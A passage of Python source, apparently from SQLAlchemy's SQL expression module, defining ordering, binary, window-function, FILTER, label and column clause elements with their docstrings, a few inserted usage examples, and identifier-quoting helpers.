.. seealso::
:func:`.asc`
:func:`.desc`
:func:`.nullsfirst`
:meth:`.Select.order_by`
"""
return UnaryExpression(
_literal_as_label_reference(column),
modifier=operators.nullslast_op,
wraps_column_expression=False)
@classmethod
def _create_desc(cls, column):
"""Produce a descending ``ORDER BY`` clause element.
e.g.::
from sqlalchemy import desc
stmt = select([users_table]).order_by(desc(users_table.c.name))
will produce SQL as::
SELECT id, name FROM user ORDER BY name DESC
The :func:`.desc` function is a standalone version of the
:meth:`.ColumnElement.desc` method available on all SQL expressions,
e.g.::
stmt = select([users_table]).order_by(users_table.c.name.desc())
:param column: A :class:`.ColumnElement` (e.g. scalar SQL expression)
with which to apply the :func:`.desc` operation.
.. seealso::
:func:`.asc`
:func:`.nullsfirst`
:func:`.nullslast`
:meth:`.Select.order_by`
"""
return UnaryExpression(
_literal_as_label_reference(column),
modifier=operators.desc_op,
wraps_column_expression=False)
@classmethod
def _create_asc(cls, column):
"""Produce an ascending ``ORDER BY`` clause element.
e.g.::
from sqlalchemy import asc
stmt = select([users_table]).order_by(asc(users_table.c.name))
will produce SQL as::
SELECT id, name FROM user ORDER BY name ASC
The :func:`.asc` function is a standalone version of the
:meth:`.ColumnElement.asc` method available on all SQL expressions,
e.g.::
stmt = select([users_table]).order_by(users_table.c.name.asc())
:param column: A :class:`.ColumnElement` (e.g. scalar SQL expression)
with which to apply the :func:`.asc` operation.
.. seealso::
:func:`.desc`
:func:`.nullsfirst`
:func:`.nullslast`
:meth:`.Select.order_by`
"""
return UnaryExpression(
_literal_as_label_reference(column),
modifier=operators.asc_op,
wraps_column_expression=False)
@classmethod
def _create_distinct(cls, expr):
"""Produce an column-expression-level unary ``DISTINCT`` clause.
This applies the ``DISTINCT`` keyword to an individual column
expression, and is typically contained within an aggregate function,
as in::
from sqlalchemy import distinct, func
stmt = select([func.count(distinct(users_table.c.name))])
The above would produce an expression resembling::
SELECT COUNT(DISTINCT name) FROM user
The :func:`.distinct` function is also available as a column-level
method, e.g. :meth:`.ColumnElement.distinct`, as in::
stmt = select([func.count(users_table.c.name.distinct())])
The :func:`.distinct` operator is different from the
:meth:`.Select.distinct` method of :class:`.Select`,
which produces a ``SELECT`` statement
with ``DISTINCT`` applied to the result set as a whole,
e.g. a ``SELECT DISTINCT`` expression. See that method for further
information.
.. seealso::
:meth:`.ColumnElement.distinct`
:meth:`.Select.distinct`
:data:`.func`
"""
expr = _literal_as_binds(expr)
return UnaryExpression(
expr, operator=operators.distinct_op,
type_=expr.type, wraps_column_expression=False)
@property
def _order_by_label_element(self):
if self.modifier in (operators.desc_op, operators.asc_op):
return self.element._order_by_label_element
else:
return None
@property
def _from_objects(self):
return self.element._from_objects
def _copy_internals(self, clone=_clone, **kw):
self.element = clone(self.element, **kw)
def get_children(self, **kwargs):
return self.element,
def compare(self, other, **kw):
"""Compare this :class:`UnaryExpression` against the given
:class:`.ClauseElement`."""
return (
isinstance(other, UnaryExpression) and
self.operator == other.operator and
self.modifier == other.modifier and
self.element.compare(other.element, **kw)
)
def _negate(self):
if self.negate is not None:
return UnaryExpression(
self.element,
operator=self.negate,
negate=self.operator,
modifier=self.modifier,
type_=self.type,
wraps_column_expression=self.wraps_column_expression)
else:
return ClauseElement._negate(self)
def self_group(self, against=None):
if self.operator and operators.is_precedent(self.operator, against):
return Grouping(self)
else:
return self
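# Illustrative sketch (editor's addition): the ordering and aggregate
# modifiers produced through UnaryExpression, per the factory docstrings
# above. `users_table` is assumed for the example.
def _example_ordering_modifiers():
    from sqlalchemy import table, column, select, func, desc, nullslast, distinct
    users_table = table('users', column('id'), column('name'))
    ordered = select([users_table]).order_by(
        nullslast(desc(users_table.c.name)))
    counted = select([func.count(distinct(users_table.c.name))])
    return str(ordered), str(counted)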
class AsBoolean(UnaryExpression):
def __init__(self, element, operator, negate):
self.element = element
self.type = type_api.BOOLEANTYPE
self.operator = operator
self.negate = negate
self.modifier = None
self.wraps_column_expression = True
def self_group(self, against=None):
return self
def _negate(self):
return self.element._negate()
class BinaryExpression(ColumnElement):
"""Represent an expression that is ``LEFT <operator> RIGHT``.
A :class:`.BinaryExpression` is generated automatically
whenever two column expressions are used in a Python binary expression::
>>> from sqlalchemy.sql import column
>>> column('a') + column('b')
<sqlalchemy.sql.expression.BinaryExpression object at 0x101029dd0>
>>> print column('a') + column('b')
a + b
"""
__visit_name__ = 'binary'
def __init__(self, left, right, operator, type_=None,
negate=None, modifiers=None):
# allow compatibility with libraries that
# refer to BinaryExpression directly and pass strings
if isinstance(operator, util.string_types):
operator = operators.custom_op(operator)
self._orig = (left, right)
self.left = left.self_group(against=operator)
self.right = right.self_group(against=operator)
self.operator = operator
self.type = type_api.to_instance(type_)
self.negate = negate
if modifiers is None:
self.modifiers = {}
else:
self.modifiers = modifiers
def __bool__(self):
if self.operator in (operator.eq, operator.ne):
return self.operator(hash(self._orig[0]), hash(self._orig[1]))
else:
raise TypeError("Boolean value of this clause is not defined")
__nonzero__ = __bool__
@property
def is_comparison(self):
return operators.is_comparison(self.operator)
@property
def _from_objects(self):
return self.left._from_objects + self.right._from_objects
def _copy_internals(self, clone=_clone, **kw):
self.left = clone(self.left, **kw)
self.right = clone(self.right, **kw)
def get_children(self, **kwargs):
return self.left, self.right
def compare(self, other, **kw):
"""Compare this :class:`BinaryExpression` against the
given :class:`BinaryExpression`."""
return (
isinstance(other, BinaryExpression) and
self.operator == other.operator and
(
self.left.compare(other.left, **kw) and
self.right.compare(other.right, **kw) or
(
operators.is_commutative(self.operator) and
self.left.compare(other.right, **kw) and
self.right.compare(other.left, **kw)
)
)
)
def self_group(self, against=None):
if operators.is_precedent(self.operator, against):
return Grouping(self)
else:
return self
def _negate(self):
if self.negate is not None:
return BinaryExpression(
self.left,
self.right,
self.negate,
negate=self.operator,
type_=self.type,
modifiers=self.modifiers)
else:
return super(BinaryExpression, self)._negate()
class Grouping(ColumnElement):
"""Represent a grouping within a column expression"""
__visit_name__ = 'grouping'
def __init__(self, element):
self.element = element
self.type = getattr(element, 'type', type_api.NULLTYPE)
def self_group(self, against=None):
return self
@property
def _key_label(self):
return self._label
@property
def _label(self):
return getattr(self.element, '_label', None) or self.anon_label
def _copy_internals(self, clone=_clone, **kw):
self.element = clone(self.element, **kw)
def get_children(self, **kwargs):
return self.element,
@property
def _from_objects(self):
return self.element._from_objects
def __getattr__(self, attr):
return getattr(self.element, attr)
def __getstate__(self):
return {'element': self.element, 'type': self.type}
def __setstate__(self, state):
self.element = state['element']
self.type = state['type']
def compare(self, other, **kw):
return isinstance(other, Grouping) and \
self.element.compare(other.element)
class Over(ColumnElement):
"""Represent an OVER clause.
This is a special operator against a so-called
"window" function, as well as any aggregate function,
which produces results relative to the result set
itself. It's supported only by certain database
backends.
"""
__visit_name__ = 'over'
order_by = None
partition_by = None
def __init__(self, func, partition_by=None, order_by=None):
"""Produce an :class:`.Over` object against a function.
Used against aggregate or so-called "window" functions,
for database backends that support window functions.
E.g.::
from sqlalchemy import over
over(func.row_number(), order_by='x')
Would produce "ROW_NUMBER() OVER(ORDER BY x)".
:param func: a :class:`.FunctionElement` construct, typically
generated by :data:`~.expression.func`.
:param partition_by: a column element or string, or a list
of such, that will be used as the PARTITION BY clause
of the OVER construct.
:param order_by: a column element or string, or a list
of such, that will be used as the ORDER BY clause
of the OVER construct.
This function is also available from the :data:`~.expression.func`
construct itself via the :meth:`.FunctionElement.over` method.
.. versionadded:: 0.7
"""
self.func = func
if order_by is not None:
self.order_by = ClauseList(
*util.to_list(order_by),
_literal_as_text=_literal_as_label_reference)
if partition_by is not None:
self.partition_by = ClauseList(
*util.to_list(partition_by),
_literal_as_text=_literal_as_label_reference)
@util.memoized_property
def type(self):
return self.func.type
def get_children(self, **kwargs):
return [c for c in
(self.func, self.partition_by, self.order_by)
if c is not None]
def _copy_internals(self, clone=_clone, **kw):
self.func = clone(self.func, **kw)
if self.partition_by is not None:
self.partition_by = clone(self.partition_by, **kw)
if self.order_by is not None:
self.order_by = clone(self.order_by, **kw)
@property
def _from_objects(self):
return list(itertools.chain(
*[c._from_objects for c in
(self.func, self.partition_by, self.order_by)
if c is not None]
))
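# Illustrative sketch (editor's addition): an OVER clause built via over(),
# matching the docstring above; the column name is an assumption.
def _example_over_usage():
    from sqlalchemy import over, func, column
    expr = over(func.row_number(), order_by=column('x'))
    # equivalent generative form: func.row_number().over(order_by=column('x'))
    return str(expr)  # renders roughly as: row_number() OVER (ORDER BY x)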
class FunctionFilter(ColumnElement):
"""Represent a function FILTER clause.
This is a special operator against aggregate and window functions,
which controls which rows are passed to it.
It's supported only by certain database backends.
Invocation of :class:`.FunctionFilter` is via
:meth:`.FunctionElement.filter`::
func.count(1).filter(True)
.. versionadded:: 1.0.0
.. seealso::
:meth:`.FunctionElement.filter`
"""
__visit_name__ = 'funcfilter'
criterion = None
def __init__(self, func, *criterion):
"""Produce a :class:`.FunctionFilter` object against a function.
Used against aggregate and window functions,
for database backends that support the "FILTER" clause.
E.g.::
from sqlalchemy import funcfilter
funcfilter(func.count(1), MyClass.name == 'some name')
Would produce "COUNT(1) FILTER (WHERE myclass.name = 'some name')".
This function is also available from the :data:`~.expression.func`
construct itself via the :meth:`.FunctionElement.filter` method.
.. versionadded:: 1.0.0
.. seealso::
:meth:`.FunctionElement.filter`
"""
self.func = func
self.filter(*criterion)
def filter(self, *criterion):
"""Produce an additional FILTER against the function.
This method adds additional criteria to the initial criteria
set up by :meth:`.FunctionElement.filter`.
Multiple criteria are joined together at SQL render time
via ``AND``.
"""
for criterion in list(criterion):
criterion = _expression_literal_as_text(criterion)
if self.criterion is not None:
self.criterion = self.criterion & criterion
else:
self.criterion = criterion
return self
def over(self, partition_by=None, order_by=None):
"""Produce an OVER clause against this filtered function.
Used against aggregate or so-called "window" functions,
for database backends that support window functions.
The expression::
func.rank().filter(MyClass.y > 5).over(order_by='x')
is shorthand for::
from sqlalchemy import over, funcfilter
over(funcfilter(func.rank(), MyClass.y > 5), order_by='x')
See :func:`~.expression.over` for a full description.
"""
return Over(self, partition_by=partition_by, order_by=order_by)
@util.memoized_property
def type(self):
return self.func.type
def get_children(self, **kwargs):
return [c for c in
(self.func, self.criterion)
if c is not None]
def _copy_internals(self, clone=_clone, **kw):
self.func = clone(self.func, **kw)
if self.criterion is not None:
self.criterion = clone(self.criterion, **kw)
@property
def _from_objects(self):
return list(itertools.chain(
*[c._from_objects for c in (self.func, self.criterion)
if c is not None]
))
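# Illustrative sketch (editor's addition): the FILTER clause built through
# FunctionElement.filter(), per the docstring above; the table is assumed.
def _example_funcfilter_usage():
    from sqlalchemy import table, column, func
    t = table('t', column('y'))
    expr = func.count(1).filter(t.c.y > 5)
    # renders roughly as: count(:count_1) FILTER (WHERE t.y > :y_1)
    return str(expr)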
class Label(ColumnElement):
"""Represents a column label (AS).
Represent a label, as typically applied to any column-level
element using the ``AS`` sql keyword.
"""
__visit_name__ = 'label'
def __init__(self, name, element, type_=None):
"""Return a :class:`Label` object for the
given :class:`.ColumnElement`.
A label changes the name of an element in the columns clause of a
``SELECT`` statement, typically via the ``AS`` SQL keyword.
This functionality is more conveniently available via the
:meth:`.ColumnElement.label` method on :class:`.ColumnElement`.
:param name: label name
:param element: a :class:`.ColumnElement`.
"""
if isinstance(element, Label):
self._resolve_label = element._label
while isinstance(element, Label):
element = element.element
if name:
self.name = name
self._resolve_label = self.name
else:
self.name = _anonymous_label(
'%%(%d %s)s' % (id(self), getattr(element, 'name', 'anon'))
)
self.key = self._label = self._key_label = self.name
self._element = element
self._type = type_
self._proxies = [element]
def __reduce__(self):
return self.__class__, (self.name, self._element, self._type)
@util.memoized_property
def _allow_label_resolve(self):
return self.element._allow_label_resolve
@property
def _order_by_label_element(self):
return self
@util.memoized_property
def type(self):
return type_api.to_instance(
self._type or getattr(self._element, 'type', None)
)
@util.memoized_property
def element(self):
return self._element.self_group(against=operators.as_)
def self_group(self, against=None):
sub_element = self._element.self_group(against=against)
if sub_element is not self._element:
return Label(self.name,
sub_element,
type_=self._type)
else:
return self
@property
def primary_key(self):
return self.element.primary_key
@property
def foreign_keys(self):
return self.element.foreign_keys
def get_children(self, **kwargs):
return self.element,
def _copy_internals(self, clone=_clone, anonymize_labels=False, **kw):
self._element = clone(self._element, **kw)
self.__dict__.pop('element', None)
self.__dict__.pop('_allow_label_resolve', None)
if anonymize_labels:
self.name = self._resolve_label = _anonymous_label(
'%%(%d %s)s' % (
id(self), getattr(self.element, 'name', 'anon'))
)
self.key = self._label = self._key_label = self.name
@property
def _from_objects(self):
return self.element._from_objects
def _make_proxy(self, selectable, name=None, **kw):
e = self.element._make_proxy(selectable,
name=name if name else self.name)
e._proxies.append(self)
if self._type is not None:
e.type = self._type
return e
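# Illustrative sketch (editor's addition): labels are normally produced via
# ColumnElement.label(), which constructs the Label element defined above.
# The table and label name are assumptions for the example.
def _example_label_usage():
    from sqlalchemy import table, column, select
    users_table = table('users', column('name'))
    stmt = select([users_table.c.name.label('user_name')])
    return str(stmt)  # SELECT users.name AS user_name FROM users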
class ColumnClause(Immutable, ColumnElement):
"""Represents a column expression from any textual string.
The :class:`.ColumnClause`, a lightweight analogue to the
:class:`.Column` class, is typically invoked using the
:func:`.column` function, as in::
from sqlalchemy import column
id, name = column("id"), column("name")
stmt = select([id, name]).select_from("user")
The above statement would produce SQL like::
SELECT id, name FROM user
:class:`.ColumnClause` is the immediate superclass of the schema-specific
:class:`.Column` object. While the :class:`.Column` class has all the
same capabilities as :class:`.ColumnClause`, the :class:`.ColumnClause`
class is usable by itself in those cases where behavioral requirements
are limited to simple SQL expression generation. The object has none of
the associations with schema-level metadata or with execution-time
behavior that :class:`.Column` does, so in that sense is a "lightweight"
version of :class:`.Column`.
Full details on :class:`.ColumnClause` usage are at :func:`.column`.
.. seealso::
:func:`.column`
:class:`.Column`
"""
__visit_name__ = 'column'
onupdate = default = server_default = server_onupdate = None
_memoized_property = util.group_expirable_memoized_property()
def __init__(self, text, type_=None, is_literal=False, _selectable=None):
"""Produce a :class:`.ColumnClause` object.
The :class:`.ColumnClause` is a lightweight analogue to the
:class:`.Column` class. The :func:`.column` function can
be invoked with just a name alone, as in::
from sqlalchemy import column
id, name = column("id"), column("name")
stmt = select([id, name]).select_from("user")
The above statement would produce SQL like::
SELECT id, name FROM user
Once constructed, :func:`.column` may be used like any other SQL
expression element such as within :func:`.select` constructs::
from sqlalchemy.sql import column
id, name = column("id"), column("name")
stmt = select([id, name]).select_from("user")
The text handled by :func:`.column` is assumed to be handled
like the name of a database column; if the string contains mixed case,
special characters, or matches a known reserved word on the target
backend, the column expression will render using the quoting
behavior determined by the backend. To produce a textual SQL
expression that is rendered exactly without any quoting,
use :func:`.literal_column` instead, or pass ``True`` as the
value of :paramref:`.column.is_literal`. Additionally, full SQL
statements are best handled using the :func:`.text` construct.
:func:`.column` can be used in a table-like
fashion by combining it with the :func:`.table` function
(which is the lightweight analogue to :class:`.Table`) to produce
a working table construct with minimal boilerplate::
from sqlalchemy import table, column, select
user = table("user",
column("id"),
column("name"),
column("description"),
)
stmt = select([user.c.description]).where(user.c.name == 'wendy')
A :func:`.column` / :func:`.table` construct like that illustrated
above can be created in an
ad-hoc fashion and is not associated with any
:class:`.schema.MetaData`, DDL, or events, unlike its
:class:`.Table` counterpart.
.. versionchanged:: 1.0.0 :func:`.expression.column` can now
be imported from the plain ``sqlalchemy`` namespace like any
other SQL element.
:param text: the text of the element.
:param type\_: :class:`.types.TypeEngine` object which can associate
this :class:`.ColumnClause` with a type.
:param is_literal: if True, the :class:`.ColumnClause` is assumed to
be an exact expression that will be delivered to the output with no
quoting rules applied regardless of case-sensitive settings. The
:func:`.literal_column()` function essentially invokes
:func:`.column` while passing ``is_literal=True``.
.. seealso::
:class:`.Column`
:func:`.literal_column`
:func:`.table`
:func:`.text`
:ref:`sqlexpression_literal_column`
"""
self.key = self.name = text
self.table = _selectable
self.type = type_api.to_instance(type_)
self.is_literal = is_literal
def _compare_name_for_result(self, other):
if self.is_literal or \
self.table is None or self.table._textual or \
not hasattr(other, 'proxy_set') or (
isinstance(other, ColumnClause) and
(other.is_literal or
other.table is None or
other.table._textual)
):
return (hasattr(other, 'name') and self.name == other.name) or \
(hasattr(other, '_label') and self._label == other._label)
else:
return other.proxy_set.intersection(self.proxy_set)
def _get_table(self):
return self.__dict__['table']
def _set_table(self, table):
self._memoized_property.expire_instance(self)
self.__dict__['table'] = table
table = property(_get_table, _set_table)
@_memoized_property
def _from_objects(self):
t = self.table
if t is not None:
return [t]
else:
return []
@util.memoized_property
def description(self):
if util.py3k:
return self.name
else:
return self.name.encode('ascii', 'backslashreplace')
@_memoized_property
def _key_label(self):
if self.key != self.name:
return self._gen_label(self.key)
else:
return self._label
@_memoized_property
def _label(self):
return self._gen_label(self.name)
@_memoized_property
def _render_label_in_columns_clause(self):
return self.table is not None
def _gen_label(self, name):
t = self.table
if self.is_literal:
return None
elif t is not None and t.named_with_column:
if getattr(t, 'schema', None):
label = t.schema.replace('.', '_') + "_" + \
t.name + "_" + name
else:
label = t.name + "_" + name
# propagate name quoting rules for labels.
if getattr(name, "quote", None) is not None:
if isinstance(label, quoted_name):
label.quote = name.quote
else:
label = quoted_name(label, name.quote)
elif getattr(t.name, "quote", None) is not None:
# can't get this situation to occur, so let's
# assert false on it for now
assert not isinstance(label, quoted_name)
label = quoted_name(label, t.name.quote)
# ensure the label name doesn't conflict with that
# of an existing column
if label in t.c:
_label = label
counter = 1
while _label in t.c:
_label = label + "_" + str(counter)
counter += 1
label = _label
return _as_truncated(label)
else:
return name
def _bind_param(self, operator, obj):
return BindParameter(self.key, obj,
_compared_to_operator=operator,
_compared_to_type=self.type,
unique=True)
def _make_proxy(self, selectable, name=None, attach=True,
name_is_truncatable=False, **kw):
# propagate the "is_literal" flag only if we are keeping our name,
# otherwise it's considered to be a label
is_literal = self.is_literal and (name is None or name == self.name)
c = self._constructor(
_as_truncated(name or self.name) if
name_is_truncatable else
(name or self.name),
type_=self.type,
_selectable=selectable,
is_literal=is_literal
)
if name is None:
c.key = self.key
c._proxies = [self]
if selectable._is_clone_of is not None:
c._is_clone_of = \
selectable._is_clone_of.columns.get(c.key)
if attach:
selectable._columns[c.key] = c
return c
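# Illustrative sketch (editor's addition): the lightweight column() / table()
# pairing described in the ColumnClause docstring above; the table and column
# names are examples only.
def _example_column_table_usage():
    from sqlalchemy import table, column, select
    user = table('user',
                 column('id'),
                 column('name'),
                 column('description'))
    stmt = select([user.c.description]).where(user.c.name == 'wendy')
    return str(stmt)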
class _IdentifiedClause(Executable, ClauseElement):
__visit_name__ = 'identified'
_execution_options = \
Executable._execution_options.union({'autocommit': False})
def __init__(self, ident):
self.ident = ident
class SavepointClause(_IdentifiedClause):
__visit_name__ = 'savepoint'
class RollbackToSavepointClause(_IdentifiedClause):
__visit_name__ = 'rollback_to_savepoint'
class ReleaseSavepointClause(_IdentifiedClause):
__visit_name__ = 'release_savepoint'
class quoted_name(util.MemoizedSlots, util.text_type):
"""Represent a SQL identifier combined with quoting preferences.
:class:`.quoted_name` is a Python unicode/str subclass which
represents a particular identifier name along with a
``quote`` flag. This ``quote`` flag, when set to
``True`` or ``False``, overrides automatic quoting behavior
for this identifier in order to either unconditionally quote
or to not quote the name. If left at its default of ``None``,
quoting behavior is applied to the identifier on a per-backend basis
based on an examination of the token itself.
A :class:`.quoted_name` object with ``quote=True`` is also
prevented from being modified in the case of a so-called
"name normalize" option. Certain database backends, such as
Oracle, Firebird, and DB2 "normalize" case-insensitive names
as uppercase. The SQLAlchemy dialects for these backends
convert from SQLAlchemy's lower-case-means-insensitive convention
to the upper-case-means-insensitive conventions of those backends.
The ``quote=True`` flag here will prevent this conversion from occurring
to support an identifier that's quoted as all lower case against
such a backend.
The :class:`.quoted_name` object is normally created automatically
when specifying the name for key schema constructs such as
:class:`.Table`, :class:`.Column`, and others. The class can also be
passed explicitly as the name to any function that receives a name which
can be quoted, such as when using the :meth:`.Engine.has_table` method with
an unconditionally quoted name::
from sqlalchemy import create_engine
from sqlalchemy.sql.elements import quoted_name
engine = create_engine("oracle+cx_oracle://some_dsn")
engine.has_table(quoted_name("some_table", True))
The above will run the "has table" logic against the Oracle backend,
passing the name exactly as ``"some_table"`` without converting to
upper case.
.. versionadded:: 0.9.0
"""
__slots__ = 'quote', 'lower', 'upper'
def __new__(cls, value, quote):
if value is None:
return None
# experimental - don't bother with quoted_name
# if quote flag is None. doesn't seem to make any dent
# in performance however
# elif not sprcls and quote is None:
# return value
elif isinstance(value, cls) and (
quote is None or value.quote == quote
):
return value
self = super(quoted_name, cls).__new__(cls, value)
self.quote = quote
return self
def __reduce__(self):
return quoted_name, (util.text_type(self), self.quote)
def _memoized_method_lower(self):
if self.quote:
return self
else:
return util.text_type(self).lower()
def _memoized_method_upper(self):
if self.quote:
return self
else:
return util.text_type(self).upper()
def __repr__(self):
backslashed = self.encode('ascii', 'backslashreplace')
if not util.py2k:
backslashed = backslashed.decode('ascii')
return "'%s'" % backslashed
class _truncated_label(quoted_name):
"""A unicode subclass used to identify symbolic "
"names that may require truncation."""
__slots__ = ()
def __new__(cls, value, quote=None):
quote = getattr(value, "quote", quote)
# return super(_truncated_label, cls).__new__(cls, value, quote, True)
return super(_truncated_label, cls).__new__(cls, value, quote)
def __reduce__(self):
return self.__class__, (util.text_type(self), self.quote)
def apply_map(self, map_):
return self
class conv(_truncated_label):
"""Mark a string indicating that a name has already been converted
by a naming convention.
This is a string subclass that indicates a name that should not be
subject to any further naming conventions.
E.g. when we create a :class:`.Constraint` using a naming convention
as follows::
m = MetaData(naming_convention={
"ck": "ck_%(table_name)s_%(constraint_name)s"
})
t = Table('t', m, Column('x', Integer),
CheckConstraint('x > 5', name='x5'))
The name of the above constraint will be rendered as ``"ck_t_x5"``.
That is, the existing name ``x5`` is used in the naming convention as the
``constraint_name`` token.
In some situations, such as in migration scripts, we may be rendering
the above :class:`.CheckConstraint` with a name that's already been
converted. In order to make sure the name isn't double-modified, the
new name is applied using the :func:`.schema.conv` marker. We can
use this explicitly as follows::
m = MetaData(naming_convention={
"ck": "ck_%(table_name)s_%(constraint_name)s"
})
t = Table('t', m, Column('x', Integer),
CheckConstraint('x > 5', name=conv('ck_t_x5')))
Where above, the :func:`.schema.conv` marker indicates that the constraint
name here is final, and the name will render as ``"ck_t_x5"`` and not
``"ck_t_ck_t_x5"``
.. versionadded:: 0.9.4
.. seealso::
:ref:`constraint_naming_conventions`
"""
__slots__ = ()
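# A minimal sketch restating the docstring example above as a callable helper.
# It assumes the top-level sqlalchemy package is importable; nothing in this
# module invokes it.
def _example_conv_usage():
    from sqlalchemy import MetaData, Table, Column, Integer, CheckConstraint
    m = MetaData(naming_convention={
        "ck": "ck_%(table_name)s_%(constraint_name)s"})
    # conv() marks the name as already converted, so the constraint renders
    # as "ck_t_x5" rather than "ck_t_ck_t_x5".
    t = Table('t', m, Column('x', Integer),
              CheckConstraint('x > 5', name=conv('ck_t_x5')))
    return t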
class _defer_name(_truncated_label):
"""mark a name as 'deferred' for the purposes of automated name
generation.
"""
__slots__ = ()
def __new__(cls, value):
if value is None:
return _NONE_NAME
elif isinstance(value, conv):
return value
else:
return super(_defer_name, cls).__new__(cls, value)
def __reduce__(self):
return self.__class__, (util.text_type(self), )
class _defer_none_name(_defer_name):
"""indicate a 'deferred' name that was ultimately the value None."""
__slots__ = ()
_NONE_NAME = _defer_none_name("_unnamed_")
# for backwards compatibility in case
# someone is re-implementing the
# _truncated_identifier() sequence in a custom
# compiler
_generated_label = _truncated_label
class _anonymous_label(_truncated_label):
"""A unicode subclass used to identify anonymously
generated names."""
__slots__ = ()
def __add__(self, other):
return _anonymous_label(
quoted_name(
util.text_type.__add__(self, util.text_type(other)),
self.quote)
)
def __radd__(self, other):
return _anonymous_label(
quoted_name(
util.text_type.__add__(util.text_type(other), self),
self.quote)
)
def apply_map(self, map_):
if self.quote is not None:
# preserve quoting only if necessary
return quoted_name(self % map_, self.quote)
else:
# else skip the constructor call
return self % map_
def _as_truncated(value):
"""coerce the given value to :class:`._truncated_label`.
Existing :class:`._truncated_label` and
:class:`._anonymous_label` objects are passed
unchanged.
"""
if isinstance(value, _truncated_label):
return value
else:
return _truncated_label(value)
def _string_or_unprintable(element):
if isinstance(element, util.string_types):
return element
else:
try:
return str(element)
except Exception:
return "unprintable element %r" % element
def _expand_cloned(elements):
"""expand the given set of ClauseElements to be the set of all 'cloned'
predecessors.
"""
return itertools.chain(*[x._cloned_set for x in elements])
def _select_iterables(elements):
"""expand tables into individual columns in the
given list of column expressions.
"""
return itertools.chain(*[c._select_iterable for c in elements])
def _cloned_intersection(a, b):
"""return the intersection of sets a and b, counting
any overlap between 'cloned' predecessors.
The returned set is in terms of the entities present within 'a'.
"""
all_overlap = set(_expand_cloned(a)).intersection(_expand_cloned(b))
return set(elem for elem in a
if all_overlap.intersection(elem._cloned_set))
def _cloned_difference(a, b):
all_overlap = set(_expand_cloned(a)).intersection(_expand_cloned(b))
return set(elem for elem in a
if not all_overlap.intersection(elem._cloned_set))
def _labeled(element):
if not hasattr(element, 'name'):
return element.label(None)
else:
return element
def _is_column(col):
"""True if ``col`` is an instance of :class:`.ColumnElement`."""
return isinstance(col, ColumnElement)
def _find_columns(clause):
"""locate Column objects within the given expression."""
cols = util.column_set()
traverse(clause, {}, {'column': cols.add})
return cols
# there is some inconsistency here between the usage of
# inspect() vs. checking for Visitable and __clause_element__.
# Ideally all functions here would derive from inspect(),
# however the inspect() versions add significant callcount
# overhead for critical functions like _interpret_as_column_or_from().
# Generally, the column-based functions are more performance critical
# and are fine just checking for __clause_element__(). It is only
# _interpret_as_from() where we'd like to be able to receive ORM entities
# that have no defined namespace, hence inspect() is needed there.
def _column_as_key(element):
if isinstance(element, util.string_types):
return element
if hasattr(element, '__clause_element__'):
element = element.__clause_element__()
try:
return element.key
except AttributeError:
return None
def _clause_element_as_expr(element):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
else:
return element
def _literal_as_label_reference(element):
if isinstance(element, util.string_types):
return _textual_label_reference(element)
elif hasattr(element, '__clause_element__'):
element = element.__clause_element__()
return _literal_as_text(element)
def _literal_and_labels_as_label_reference(element):
if isinstance(element, util.string_types):
return _textual_label_reference(element)
elif hasattr(element, '__clause_element__'):
element = element.__clause_element__()
if isinstance(element, ColumnElement) and \
element._order_by_label_element is not None:
return _label_reference(element)
else:
return _literal_as_text(element)
def _expression_literal_as_text(element):
return _literal_as_text(element, warn=True)
def _literal_as_text(element, warn=False):
if isinstance(element, Visitable):
return element
elif hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif isinstance(element, util.string_types):
if warn:
util.warn_limited(
"Textual SQL expression %(expr)r should be "
"explicitly declared as text(%(expr)r)",
{"expr": util.ellipses_string(element)})
return TextClause(util.text_type(element))
elif isinstance(element, (util.NoneType, bool)):
return _const_expr(element)
else:
raise exc.ArgumentError(
"SQL expression object or string expected, got object of type %r "
"instead" % type(element)
)
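# A minimal sketch of the coercion rules implemented above, unused by the
# module itself: ClauseElements pass through unchanged, plain strings become
# TextClause, and None becomes Null().
def _example_literal_as_text_coercion():
    as_text = _literal_as_text("x > 5")   # plain string -> TextClause
    as_null = _literal_as_text(None)      # None -> Null()
    return isinstance(as_text, TextClause) and isinstance(as_null, Null)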
def _no_literals(element):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif not isinstance(element, Visitable):
raise exc.ArgumentError("Ambiguous literal: %r. Use the 'text()' "
"function to indicate a SQL expression "
"literal, or 'literal()' to indicate a "
"bound value." % element)
else:
return element
def _is_literal(element):
return not isinstance(element, Visitable) and \
not hasattr(element, '__clause_element__')
def _only_column_elements_or_none(element, name):
if element is None:
return None
else:
return _only_column_elements(element, name)
def _only_column_elements(element, name):
if hasattr(element, '__clause_element__'):
element = element.__clause_element__()
if not isinstance(element, ColumnElement):
raise exc.ArgumentError(
"Column-based expression object expected for argument "
"'%s'; got: '%s', type %s" % (name, element, type(element)))
return element
def _literal_as_binds(element, name=None, type_=None):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif not isinstance(element, Visitable):
if element is None:
return Null()
else:
return BindParameter(name, element, type_=type_, unique=True)
else:
return element
_guess_straight_column = re.compile(r'^\w\S*$', re.I)
def _interpret_as_column_or_from(element):
if isinstance(element, Visitable):
return element
elif hasattr(element, '__clause_element__'):
return element.__clause_element__()
insp = inspection.inspect(element, raiseerr=False)
if insp is None:
if isinstance(element, (util.NoneType, bool)):
return _const_expr(element)
elif hasattr(insp, "selectable"):
return insp.selectable
# be forgiving as this is an extremely common
# and known expression
if element == "*":
guess_is_literal = True
elif isinstance(element, (numbers.Number)):
return ColumnClause(str(element), is_literal=True)
else:
element = str(element)
# give into temptation, as this fact we are guessing about
# is not one we've previously ever needed our users to tell us;
# but let them know we are not happy about it
guess_is_literal = not _guess_straight_column.match(element)
util.warn_limited(
"Textual column expression %(column)r should be "
"explicitly declared with text(%(column)r), "
"or use %(literal_column)s(%(column)r) "
"for more specificity",
{
"column": util.ellipses_string(element),
"literal_column": "literal_column"
if guess_is_literal else "column"
})
return ColumnClause(
element,
is_literal=guess_is_literal)
def _const_expr(element):
if isinstance(element, (Null, False_, True_)):
return element
elif element is None:
return Null()
elif element is False:
return False_()
elif element is True:
return True_()
else:
raise exc.ArgumentError(
"Expected None, False, or True"
)
def _type_from_args(args):
for a in args:
if not a.type._isnull:
return a.type
else:
return type_api.NULLTYPE
def _corresponding_column_or_error(fromclause, column,
require_embedded=False):
c = fromclause.corresponding_column(column,
require_embedded=require_embedded)
if c is None:
raise exc.InvalidRequestError(
"Given column '%s', attached to table '%s', "
"failed to locate a corresponding column from table '%s'"
%
(column,
getattr(column, 'table', None),
fromclause.description)
)
return c
